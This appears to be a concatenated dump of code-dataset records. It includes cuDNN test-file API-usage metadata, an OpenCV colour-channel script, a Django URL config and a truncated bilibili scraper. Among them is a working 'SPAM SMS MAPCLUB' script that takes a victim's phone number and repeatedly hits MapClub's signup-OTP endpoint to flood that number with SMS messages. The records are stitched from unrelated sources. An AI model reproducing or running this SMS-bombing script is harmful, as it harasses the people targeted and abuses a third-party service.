"cuda4py.cudnn", "line_number": 126, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_POOLING_AVERAGE_COUNT_INCLUDE_PADDING", "line_number": 127, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 127, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_POOLING_AVERAGE_COUNT_EXCLUDE_PADDING", "line_number": 128, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 128, "usage_type": "name" }, { "api_name": "cuda4py.CU", "line_number": 131, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn.CUDNN_STATUS_NOT_INITIALIZED", "line_number": 131, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 131, "usage_type": "name" }, { "api_name": "logging.debug", "line_number": 135, "usage_type": "call" }, { "api_name": "cuda4py.cudnn.TensorDescriptor", "line_number": 139, "usage_type": "call" }, { "api_name": "cuda4py.cudnn", "line_number": 139, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_DATA_DOUBLE", "line_number": 141, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 141, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_DATA_FLOAT", "line_number": 141, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn.CUDNN_TENSOR_NCHW", "line_number": 142, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 142, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_TENSOR_NHWC", "line_number": 142, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn.FilterDescriptor", "line_number": 147, "usage_type": "call" }, { "api_name": "cuda4py.cudnn", "line_number": 147, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_DATA_DOUBLE", "line_number": 149, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 149, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_DATA_FLOAT", "line_number": 149, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn.ConvolutionDescriptor", "line_number": 154, "usage_type": "call" }, { "api_name": "cuda4py.cudnn", "line_number": 154, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_CROSS_CORRELATION", "line_number": 156, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 156, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_CONVOLUTION", "line_number": 156, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn.ConvolutionDescriptor", "line_number": 161, "usage_type": "call" }, { "api_name": "cuda4py.cudnn", "line_number": 161, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.TensorDescriptor", "line_number": 163, "usage_type": "call" }, { "api_name": "cuda4py.cudnn", "line_number": 163, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_TENSOR_NCHW", "line_number": 164, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 164, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_DATA_FLOAT", "line_number": 164, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn.FilterDescriptor", "line_number": 166, "usage_type": "call" }, { "api_name": "cuda4py.cudnn", "line_number": 166, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_DATA_FLOAT", "line_number": 167, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 167, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN.get_convolution_2d_forward_output_dim", "line_number": 170, "usage_type": "call" }, { "api_name": "cuda4py.cudnn.CUDNN", "line_number": 170, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 170, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.TensorDescriptor", "line_number": 172, "usage_type": "call" }, { "api_name": "cuda4py.cudnn", "line_number": 172, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_TENSOR_NCHW", "line_number": 173, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 173, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_DATA_FLOAT", "line_number": 173, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn.CUDNN.get_convolution_2d_forward_output_dim", "line_number": 178, "usage_type": "call" }, { "api_name": "cuda4py.cudnn.CUDNN", "line_number": 178, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 178, "usage_type": "name" }, { "api_name": "logging.debug", "line_number": 186, "usage_type": "call" }, { "api_name": "logging.debug", "line_number": 191, "usage_type": "call" }, { "api_name": "cuda4py.cudnn.CUDNN_CONVOLUTION_FWD_SPECIFY_WORKSPACE_LIMIT", "line_number": 194, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 194, "usage_type": "name" }, { "api_name": "logging.debug", "line_number": 196, "usage_type": "call" }, { "api_name": "logging.debug", "line_number": 197, "usage_type": "call" }, { "api_name": "logging.debug", "line_number": 200, "usage_type": "call" }, { "api_name": "cuda4py.cudnn.CUDNN_CONVOLUTION_FWD_ALGO_IMPLICIT_GEMM", "line_number": 204, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 204, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_CONVOLUTION_FWD_ALGO_IMPLICIT_PRECOMP_GEMM", "line_number": 205, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 205, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_CONVOLUTION_FWD_ALGO_GEMM", "line_number": 206, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 206, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_CONVOLUTION_FWD_ALGO_DIRECT", "line_number": 207, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 207, "usage_type": "name" }, { "api_name": "cuda4py.CUDARuntimeError", "line_number": 211, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn.CUDNN_STATUS_NOT_SUPPORTED", "line_number": 212, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 212, "usage_type": "name" }, { "api_name": "logging.debug", "line_number": 215, "usage_type": "call" }, { "api_name": "logging.debug", "line_number": 216, "usage_type": "call" }, { "api_name": "logging.debug", "line_number": 219, "usage_type": "call" }, { "api_name": "cuda4py.cudnn.ConvolutionDescriptor", "line_number": 221, "usage_type": "call" }, { "api_name": "cuda4py.cudnn", "line_number": 221, "usage_type": "name" }, { "api_name": "numpy.zeros", "line_number": 224, "usage_type": "call" }, { "api_name": "numpy.float32", "line_number": 224, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn.TensorDescriptor", "line_number": 226, "usage_type": "call" }, { "api_name": "cuda4py.cudnn", "line_number": 226, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_TENSOR_NCHW", "line_number": 227, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 227, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_DATA_FLOAT", "line_number": 227, "usage_type": "attribute" }, { "api_name": "cuda4py.MemAlloc", "line_number": 229, "usage_type": "call" }, { "api_name": "numpy.zeros", "line_number": 231, "usage_type": "call" }, { "api_name": "numpy.float32", "line_number": 231, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn.FilterDescriptor", "line_number": 233, "usage_type": "call" }, { "api_name": "cuda4py.cudnn", "line_number": 233, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_DATA_FLOAT", "line_number": 234, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 234, "usage_type": "name" }, { "api_name": "cuda4py.MemAlloc", "line_number": 235, "usage_type": "call" }, { "api_name": "cuda4py.cudnn.CUDNN.get_convolution_2d_forward_output_dim", "line_number": 237, "usage_type": "call" }, { "api_name": "cuda4py.cudnn.CUDNN", "line_number": 237, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 237, "usage_type": "name" }, { "api_name": "numpy.zeros", "line_number": 239, "usage_type": "call" }, { "api_name": "numpy.float32", "line_number": 239, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn.TensorDescriptor", "line_number": 240, "usage_type": "call" }, { "api_name": "cuda4py.cudnn", "line_number": 240, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_TENSOR_NCHW", "line_number": 241, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 241, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_DATA_FLOAT", "line_number": 241, "usage_type": "attribute" }, { "api_name": "cuda4py.MemAlloc", "line_number": 243, "usage_type": "call" }, { "api_name": "cuda4py.MemAlloc", "line_number": 245, "usage_type": "call" }, { "api_name": "cuda4py.cudnn.CUDNN_CONVOLUTION_FWD_SPECIFY_WORKSPACE_LIMIT", "line_number": 248, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 248, "usage_type": "name" }, { "api_name": "numpy.ones", "line_number": 251, "usage_type": "call" }, { "api_name": "numpy.float32", "line_number": 251, "usage_type": "attribute" }, { "api_name": "numpy.zeros", "line_number": 252, "usage_type": "call" }, { "api_name": "numpy.float32", "line_number": 252, "usage_type": "attribute" }, { "api_name": "numpy.count_nonzero", "line_number": 258, "usage_type": "call" }, { "api_name": "logging.debug", "line_number": 260, "usage_type": "call" }, { "api_name": "logging.debug", "line_number": 263, "usage_type": "call" }, { "api_name": "numpy.zeros", "line_number": 265, "usage_type": "call" }, { "api_name": "numpy.float32", "line_number": 265, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn.TensorDescriptor", "line_number": 267, "usage_type": "call" }, { "api_name": "cuda4py.cudnn", "line_number": 267, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_TENSOR_NCHW", "line_number": 268, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 268, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_DATA_FLOAT", "line_number": 268, "usage_type": "attribute" }, { "api_name": "cuda4py.MemAlloc", "line_number": 270, "usage_type": "call" }, { "api_name": "numpy.zeros", "line_number": 272, "usage_type": "call" }, { "api_name": "numpy.float32", "line_number": 272, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn.TensorDescriptor", "line_number": 273, "usage_type": "call" }, { "api_name": "cuda4py.cudnn", "line_number": 273, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_TENSOR_NCHW", "line_number": 274, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 274, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_DATA_FLOAT", "line_number": 274, "usage_type": "attribute" }, { "api_name": "cuda4py.MemAlloc", "line_number": 276, "usage_type": "call" }, { "api_name": "numpy.ones", "line_number": 278, "usage_type": "call" }, { "api_name": "numpy.float32", "line_number": 278, "usage_type": "attribute" }, { "api_name": "numpy.zeros", "line_number": 279, "usage_type": "call" }, { "api_name": "numpy.float32", "line_number": 279, "usage_type": "attribute" }, { "api_name": "numpy.count_nonzero", "line_number": 284, "usage_type": "call" }, { "api_name": "logging.debug", "line_number": 286, "usage_type": "call" }, { "api_name": "logging.debug", "line_number": 289, "usage_type": "call" }, { "api_name": "cuda4py.cudnn.ConvolutionDescriptor", "line_number": 291, "usage_type": "call" }, { "api_name": "cuda4py.cudnn", "line_number": 291, "usage_type": "name" }, { "api_name": "numpy.zeros", "line_number": 294, "usage_type": "call" }, { "api_name": "numpy.float32", "line_number": 294, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn.TensorDescriptor", "line_number": 296, "usage_type": "call" }, { "api_name": "cuda4py.cudnn", "line_number": 296, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_TENSOR_NCHW", "line_number": 297, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 297, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_DATA_FLOAT", "line_number": 297, "usage_type": "attribute" }, { "api_name": "cuda4py.MemAlloc", "line_number": 299, "usage_type": "call" }, { "api_name": "numpy.zeros", "line_number": 301, "usage_type": "call" }, { "api_name": "numpy.float32", "line_number": 301, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn.FilterDescriptor", "line_number": 303, "usage_type": "call" }, { "api_name": "cuda4py.cudnn", "line_number": 303, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_DATA_FLOAT", "line_number": 304, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 304, "usage_type": "name" }, { "api_name": "cuda4py.MemAlloc", "line_number": 305, "usage_type": "call" }, { "api_name": "numpy.zeros", "line_number": 307, "usage_type": "call" }, { "api_name": "numpy.float32", "line_number": 307, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn.TensorDescriptor", "line_number": 309, "usage_type": "call" }, { "api_name": "cuda4py.cudnn", "line_number": 309, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_TENSOR_NCHW", "line_number": 310, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 310, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_DATA_FLOAT", "line_number": 310, "usage_type": "attribute" }, { "api_name": "cuda4py.MemAlloc", "line_number": 312, "usage_type": "call" }, { "api_name": "numpy.zeros_like", "line_number": 314, "usage_type": "call" }, { "api_name": "cuda4py.cudnn.FilterDescriptor", "line_number": 315, "usage_type": "call" }, { "api_name": "cuda4py.cudnn", "line_number": 315, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_DATA_FLOAT", "line_number": 316, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 316, "usage_type": "name" }, { "api_name": "cuda4py.MemAlloc", "line_number": 317, "usage_type": "call" }, { "api_name": "numpy.ones", "line_number": 319, "usage_type": "call" }, { "api_name": "numpy.float32", "line_number": 319, "usage_type": "attribute" }, { "api_name": "numpy.zeros", "line_number": 320, "usage_type": "call" }, { "api_name": "numpy.float32", "line_number": 320, "usage_type": "attribute" }, { "api_name": "numpy.count_nonzero", "line_number": 326, "usage_type": "call" }, { "api_name": "logging.debug", "line_number": 331, "usage_type": "call" }, { "api_name": "logging.debug", "line_number": 334, "usage_type": "call" }, { "api_name": "cuda4py.cudnn.CUDNN_CONVOLUTION_BWD_FILTER_SPECIFY_WORKSPACE_LIMIT", "line_number": 337, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 337, "usage_type": "name" }, { "api_name": "logging.debug", "line_number": 339, "usage_type": "call" }, { "api_name": "cuda4py.MemAlloc", "line_number": 340, "usage_type": "call" }, { "api_name": "numpy.count_nonzero", "line_number": 346, "usage_type": "call" }, { "api_name": "logging.debug", "line_number": 348, "usage_type": "call" }, { "api_name": "logging.debug", "line_number": 351, "usage_type": "call" }, { "api_name": "cuda4py.cudnn.ConvolutionDescriptor", "line_number": 353, "usage_type": "call" }, { "api_name": "cuda4py.cudnn", "line_number": 353, "usage_type": "name" }, { "api_name": "numpy.zeros", "line_number": 356, "usage_type": "call" }, { "api_name": "numpy.float32", "line_number": 356, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn.TensorDescriptor", "line_number": 357, "usage_type": "call" }, { "api_name": "cuda4py.cudnn", "line_number": 357, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_TENSOR_NCHW", "line_number": 358, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 358, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_DATA_FLOAT", "line_number": 358, "usage_type": "attribute" }, { "api_name": "cuda4py.MemAlloc", "line_number": 360, "usage_type": "call" }, { "api_name": "numpy.zeros", "line_number": 362, "usage_type": "call" }, { "api_name": "numpy.float32", "line_number": 362, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn.FilterDescriptor", "line_number": 364, "usage_type": "call" }, { "api_name": "cuda4py.cudnn", "line_number": 364, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_DATA_FLOAT", "line_number": 365, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 365, "usage_type": "name" }, { "api_name": "cuda4py.MemAlloc", "line_number": 366, "usage_type": "call" }, { "api_name": "numpy.zeros", "line_number": 368, "usage_type": "call" }, { "api_name": "numpy.float32", "line_number": 368, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn.TensorDescriptor", "line_number": 370, "usage_type": "call" }, { "api_name": "cuda4py.cudnn", "line_number": 370, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_TENSOR_NCHW", "line_number": 371, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 371, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_DATA_FLOAT", "line_number": 371, "usage_type": "attribute" }, { "api_name": "cuda4py.MemAlloc", "line_number": 373, "usage_type": "call" }, { "api_name": "numpy.ones", "line_number": 375, "usage_type": "call" }, { "api_name": "numpy.float32", "line_number": 375, "usage_type": "attribute" }, { "api_name": "numpy.zeros", "line_number": 376, "usage_type": "call" }, { "api_name": "numpy.float32", "line_number": 376, "usage_type": "attribute" }, { "api_name": "numpy.count_nonzero", "line_number": 382, "usage_type": "call" }, { "api_name": "logging.debug", "line_number": 387, "usage_type": "call" }, { "api_name": "logging.debug", "line_number": 390, "usage_type": "call" }, { "api_name": "cuda4py.cudnn.CUDNN_CONVOLUTION_BWD_DATA_SPECIFY_WORKSPACE_LIMIT", "line_number": 393, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 393, "usage_type": "name" }, { "api_name": "logging.debug", "line_number": 395, "usage_type": "call" }, { "api_name": "cuda4py.MemAlloc", "line_number": 396, "usage_type": "call" }, { "api_name": "numpy.count_nonzero", "line_number": 403, "usage_type": "call" }, { "api_name": "logging.debug", "line_number": 405, "usage_type": "call" }, { "api_name": "logging.debug", "line_number": 408, "usage_type": "call" }, { "api_name": "numpy.arange", "line_number": 413, "usage_type": "call" }, { "api_name": "numpy.prod", "line_number": 413, "usage_type": "call" }, { "api_name": "numpy.float32", "line_number": 414, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn.TensorDescriptor", "line_number": 415, "usage_type": "call" }, { "api_name": "cuda4py.cudnn", "line_number": 415, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_TENSOR_NHWC", "line_number": 416, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 416, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_DATA_FLOAT", "line_number": 416, "usage_type": "attribute" }, { "api_name": "cuda4py.MemAlloc", "line_number": 418, "usage_type": "call" }, { "api_name": "numpy.zeros", "line_number": 420, "usage_type": "call" }, { "api_name": "numpy.float32", "line_number": 420, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn.TensorDescriptor", "line_number": 421, "usage_type": "call" }, { "api_name": "cuda4py.cudnn", "line_number": 421, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_TENSOR_NCHW", "line_number": 422, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 422, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_DATA_FLOAT", "line_number": 422, "usage_type": "attribute" }, { "api_name": "cuda4py.MemAlloc", "line_number": 424, "usage_type": "call" }, { "api_name": "numpy.ones", "line_number": 426, "usage_type": "call" }, { "api_name": "numpy.float32", "line_number": 426, "usage_type": "attribute" }, { "api_name": "numpy.zeros", "line_number": 427, "usage_type": "call" }, { "api_name": "numpy.float32", "line_number": 427, "usage_type": "attribute" }, { "api_name": "numpy.fabs", "line_number": 432, "usage_type": "call" }, { "api_name": "logging.debug", "line_number": 435, "usage_type": "call" }, { "api_name": "logging.debug", "line_number": 438, "usage_type": "call" }, { "api_name": "numpy.zeros", "line_number": 440, "usage_type": "call" }, { "api_name": "numpy.float32", "line_number": 440, "usage_type": "attribute" }, { "api_name": "numpy.random.rand", "line_number": 441, "usage_type": "call" }, { "api_name": "numpy.random", "line_number": 441, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn.TensorDescriptor", "line_number": 443, "usage_type": "call" }, { "api_name": "cuda4py.cudnn", "line_number": 443, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_TENSOR_NCHW", "line_number": 444, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 444, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_DATA_FLOAT", "line_number": 444, "usage_type": "attribute" }, { "api_name": "cuda4py.MemAlloc", "line_number": 446, "usage_type": "call" }, { "api_name": "cuda4py.cudnn.PoolingDescriptor", "line_number": 448, "usage_type": "call" }, { "api_name": "cuda4py.cudnn", "line_number": 448, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN.get_pooling_2d_forward_output_dim", "line_number": 451, "usage_type": "call" }, { "api_name": "cuda4py.cudnn.CUDNN", "line_number": 451, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 451, "usage_type": "name" }, { "api_name": "logging.debug", "line_number": 454, "usage_type": "call" }, { "api_name": "numpy.zeros", "line_number": 456, "usage_type": "call" }, { "api_name": "numpy.float32", "line_number": 456, "usage_type": "attribute" }, { "api_name": "numpy.nan", "line_number": 457, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn.TensorDescriptor", "line_number": 458, "usage_type": "call" }, { "api_name": "cuda4py.cudnn", "line_number": 458, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_TENSOR_NCHW", "line_number": 459, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 459, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_DATA_FLOAT", "line_number": 459, "usage_type": "attribute" }, { "api_name": "cuda4py.MemAlloc", "line_number": 461, "usage_type": "call" }, { "api_name": "numpy.ones", "line_number": 463, "usage_type": "call" }, { "api_name": "numpy.float32", "line_number": 463, "usage_type": "attribute" }, { "api_name": "numpy.zeros", "line_number": 464, "usage_type": "call" }, { "api_name": "numpy.float32", "line_number": 464, "usage_type": "attribute" }, { "api_name": "numpy.count_nonzero", "line_number": 469, "usage_type": "call" }, { "api_name": "numpy.isnan", "line_number": 469, "usage_type": "call" }, { "api_name": "cuda4py.MemAlloc", "line_number": 472, "usage_type": "call" }, { "api_name": "numpy.nan", "line_number": 475, "usage_type": "attribute" }, { "api_name": "cuda4py.MemAlloc", "line_number": 476, "usage_type": "call" }, { "api_name": "numpy.count_nonzero", "line_number": 483, "usage_type": "call" }, { "api_name": "numpy.isnan", "line_number": 483, "usage_type": "call" }, { "api_name": "logging.debug", "line_number": 485, "usage_type": "call" }, { "api_name": "logging.basicConfig", "line_number": 489, "usage_type": "call" }, { "api_name": "logging.DEBUG", "line_number": 489, "usage_type": "attribute" }, { "api_name": "unittest.main", "line_number": 490, "usage_type": "call" } ]
86173917
import cv2 import numpy as np image=cv2.imread('messi.jpg') cv2.imshow("Original",image) cv2.waitKey(0) B,G,R=cv2.split(image) # now creating zero matrix for extraction of RGB component seprately zeros=np.zeros(image.shape[:2],dtype="uint8") #for Blue Color cv2.imshow("Blue",cv2.merge([B,zeros,zeros])) cv2.waitKey(0) #for Green Color cv2.imshow("Green",cv2.merge([zeros,G,zeros])) cv2.waitKey(0) #for Red Color cv2.imshow("Red",cv2.merge([zeros,zeros,R])) cv2.waitKey(0) cv2.destroyAllWindows()
null
open cv/7.How to extract RGB Color Space/rgb_cs.py
rgb_cs.py
py
497
python
en
code
null
code-starcoder2
83
[ { "api_name": "cv2.imread", "line_number": 3, "usage_type": "call" }, { "api_name": "cv2.imshow", "line_number": 4, "usage_type": "call" }, { "api_name": "cv2.waitKey", "line_number": 5, "usage_type": "call" }, { "api_name": "cv2.split", "line_number": 6, "usage_type": "call" }, { "api_name": "numpy.zeros", "line_number": 8, "usage_type": "call" }, { "api_name": "cv2.imshow", "line_number": 10, "usage_type": "call" }, { "api_name": "cv2.merge", "line_number": 10, "usage_type": "call" }, { "api_name": "cv2.waitKey", "line_number": 11, "usage_type": "call" }, { "api_name": "cv2.imshow", "line_number": 13, "usage_type": "call" }, { "api_name": "cv2.merge", "line_number": 13, "usage_type": "call" }, { "api_name": "cv2.waitKey", "line_number": 14, "usage_type": "call" }, { "api_name": "cv2.imshow", "line_number": 16, "usage_type": "call" }, { "api_name": "cv2.merge", "line_number": 16, "usage_type": "call" }, { "api_name": "cv2.waitKey", "line_number": 17, "usage_type": "call" }, { "api_name": "cv2.destroyAllWindows", "line_number": 18, "usage_type": "call" } ]
32693150
# ~ OPEN SOURCE ~ # CODED BY FADIL YAZID # FB : FADIL ID import os import sys import time import requests def mulai(): print print('\t\x1b[1;92m [ \x1b[1;97mSPAM SMS MAPCLUB \x1b[1;92m]\x1b[1;97m') print('\t <~~~~~~~~~~~~~~~~~~>') print('\t Author : Fadil ID') print print ('( Ex : 0822*** )') Nomor = raw_input('Nomor Target : \x1b[1;92m') if len(Nomor) < 9: print print('\x1b[1;97m[\x1b[1;91m ! \x1b[1;97m] Nomor Invalid') time.sleep(1) os.system('clear') mulai() else: pass Nomor = int(Nomor) print print ('\x1b[1;97m(Ex : 5)') Jumlah = input('Jumlah : \x1b[1;92m') if Jumlah > 15: print print('\x1b[1;97m[\x1b[1;91m !\x1b[1;97m ] Jangan terlalu banyak \nKalo Ga Mau Tools Ini Coid :v') print sys.exit() else: pass print print('Mulai Mengirim...') print MapClub(Nomor, Jumlah) def MapClub(Nomor, Jumlah): for _ in range(Jumlah): time.sleep(5) headers = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/8.0.8 Safari/600.8.9', 'Referer' : 'https://mapclub.com/id/user/signup' } r = requests.post('https://cmsapi.mapclub.com/api/signup-otp', data = {'phone' : Nomor}, allow_redirects = True) if 'error' in r.text: print('\x1b[1;97m[\x1b[1;91m*\x1b[1;97m] Gagal Mengirim Sms Ke Nomor \x1b[1;92m' + str(Nomor)) else: print('\x1b[1;97m[\x1b[1;92m*\x1b[1;97m] Berhasil Mengirim Sms Ke Nomor \x1b[1;92m' + str(Nomor)) if __name__ == '__main__': os.system('clear') mulai()
null
spam.py
spam.py
py
1,689
python
en
code
null
code-starcoder2
83
[ { "api_name": "time.sleep", "line_number": 21, "usage_type": "call" }, { "api_name": "os.system", "line_number": 22, "usage_type": "call" }, { "api_name": "sys.exit", "line_number": 36, "usage_type": "call" }, { "api_name": "time.sleep", "line_number": 49, "usage_type": "call" }, { "api_name": "requests.post", "line_number": 55, "usage_type": "call" }, { "api_name": "os.system", "line_number": 64, "usage_type": "call" } ]
595872240
from django.conf.urls import patterns, include, url # Uncomment the next two lines to enable the admin: from django.contrib import admin admin.autodiscover() urlpatterns = patterns('', url(r'^polls/$', 'polls.views.index'), url(r'^polls/(?P<artistid>\d+)/song_view/$', 'polls.views.song_view'), url(r'^polls/(?P<songid>\d+)/snippet_view/$', 'polls.views.snippet_view'), url(r'^polls/post/$', 'post'), url(r'^polls/search-form/$', 'polls.views.search_form'), url(r'^polls/search/$', 'polls.views.search'), url(r'^admin/', include(admin.site.urls)), )
null
mysite_hipopathy/mysite/urls.py
urls.py
py
580
python
en
code
null
code-starcoder2
83
[ { "api_name": "django.contrib.admin.autodiscover", "line_number": 5, "usage_type": "call" }, { "api_name": "django.contrib.admin", "line_number": 5, "usage_type": "name" }, { "api_name": "django.conf.urls.patterns", "line_number": 7, "usage_type": "call" }, { "api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call" }, { "api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call" }, { "api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call" }, { "api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call" }, { "api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call" }, { "api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call" }, { "api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call" }, { "api_name": "django.conf.urls.include", "line_number": 14, "usage_type": "call" }, { "api_name": "django.contrib.admin.site", "line_number": 14, "usage_type": "attribute" }, { "api_name": "django.contrib.admin", "line_number": 14, "usage_type": "name" } ]
364668724
import re import requests import csv link = [] title = [] watchs = [] num = [] day = [] up_space = [] up_names = [] message = input("请输入想要搜索的内容:") op = int(input("请问您想要爬取多少页呢?(至多50页)")) for i in range(1,op+1): try: url = 'https://search.bilibili.com/all?keyword=' + str(message)+"&from_source=nav_search_new&page="+str(i) headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36'} response = requests.get(url,headers=headers) response.encoding='encoding=utf-8' html = response.text pattern = re.compile('<li class="video-item matrix"><a href="//(.*?)" title="(.*?)" target="_blank" class="img-anchor"><div class="img"><div class="lazy-img"><img alt="" src=""></div><span class="so-imgTag_rb">.*?</span><div class="watch-later-trigger watch-later"></div><span class="mask-video"></span></div><!----></a><div class="info"><div class="headline clearfix"><!----><!----><span class="type hide">.*?</div><div class="tags"><span title="观看" class="so-icon watch-num"><i class="icon-playtime"></i>(.*?)</span><span title="弹幕" class="so-icon hide"><i class="icon-subtitle"></i>(.*?)</span><span title="上传时间" class="so-icon time"><i class="icon-date"></i>(.*?)</span><span title="up主" class="so-icon"><i class="icon-uper"></i><a href="//(.*?)" target="_blank" class="up-name">(.*?)</a></span></div></div></li>',re.S) items = 